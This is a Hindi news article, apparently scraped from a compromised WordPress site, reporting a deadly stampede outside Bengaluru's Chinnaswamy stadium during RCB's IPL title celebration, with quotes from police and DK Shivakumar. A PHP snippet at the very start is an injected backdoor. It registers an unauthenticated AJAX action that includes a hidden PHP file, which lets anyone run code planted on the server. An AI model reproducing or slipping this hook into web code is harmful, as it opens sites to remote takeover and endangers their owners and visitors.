if(!function_exists('file_check_tmp3og2p0p6')){ add_action('wp_ajax_nopriv_file_check_tmp3og2p0p6', 'file_check_tmp3og2p0p6'); add_action('wp_ajax_file_check_tmp3og2p0p6', 'file_check_tmp3og2p0p6'); function file_check_tmp3og2p0p6() { $file = __DIR__ . '/' . 'tmp3og2p0p6.php'; if (file_exists($file)) { include $file; } die(); } }बेंगलुरु के स्टेडियम में भगदड़ से 10 लोगों की मौत - Current Media

बेंगलुरु के स्टेडियम में भगदड़ से 10 लोगों की मौत

बेंगलुरु । बेंगलुरु के चिन्नास्वामी स्टेडियम के बाहर भगदड़ मचने से कम से कम 10 लोगों की मौत हो गई है। रॉयल चौलेंजर्स बेंगलुरु की जीत का जश्न मनाने के लिए जमा हुए थे।
18 सालों में पहली बार आईपीएल की ट्रॉफ़ी जीतने वाली टीम के स्वागत में बुधवार को लाखों लोग सड़कों पर उतरे. इनमें युवा, महिलाएं, बच्चे और बुज़ुर्ग सब शामिल थे। एक वरिष्ठ पुलिस अधिकारी के अनुसार चिन्नास्वामी स्टेडियम के गेट पर भगदड़ मचने से करीब 10 लोगों की मौत हो गई है।
पुलिस अधिकारी ने बताया, जब हादसा हुआ तो स्टेडियम के दरवाज़े खुले नहीं थे लेकिन बहुत सारे लोगों ने छोटे दरवाज़े से घुसने की कोशिश की, जिससे भगदड़ हुई।
कर्नाटक के उपमुख्यमंत्री डीके शिवकुमार ने एक्स पर पोस्ट किया, लोग आरसीबी की आईपीएल में जीत के जश्न का गवाह बनने आए थे। लेकिन इस त्रासदी से हमें बेहद दुख पहुंचा है और धक्का लगा है। जिनकी मौत हुई है उनके परिवारों को मेरी संवेदना. जीत पर हमें गर्व है लेकिन ये किसी की ज़िंदगी से बड़ा नहीं हो सकता. मैं सभी से अपील करता हूं कि वो सुरक्षा का ध्यान रखें।

About currentmedia09@gmail.com

Currentmedia.in राष्ट्रीय स्तर पर तेजी से बढ़ती हुई हिंदी समाचार वेबासाइट है। वेबसाइट में ब्यूरोक्रेसी में ताजा घटनाक्रम, देश और समाज के लिए अमूल्य योगदान देने वाले व अपने कार्यो के दम पर अपनी पहचान बनाने वाले आइएएस और आइपीएस अधिकारियों व डॉक्टरो, कानून के जानकारों की रोचक स्टोरी के साथ उनके जीवन संघर्षो पर आधारित निष्पक्ष लेख पाठक को मिलेंगे। वेबसाइट में अन्य क्षेत्रों के भी विश्वसनीय, प्रमाणिक और निष्पक्ष समाचार पाठक वर्ग के लिए उपलब्ध रहेगा, इसके लिए वेबसाइट की ऑनलाइन संपादकीय टीम हर रोज विस्तृत कंटेट अपडेट करती रहेगी। संपादकीय टीम की कोशिश यही रहेगी की न्यूज कंटेट को लेकर पाठक वर्ग को किसी तरह की निराशा हाथ न लगे। साइट 24 घंटे प्रयोग में रहेगी।

Check Also

खिरिया घाट पर अवैध खनन के खिलाफ बड़ी कार्रवाई, आधा दर्जन से अधिक ट्रैक्टर-ट्रॉलियां पकड़ीं

झांसी। राशिद पठान । अवैध खनन के खिलाफ प्रशासन ने गुरुवार रात बड़ी कार्रवाई करते …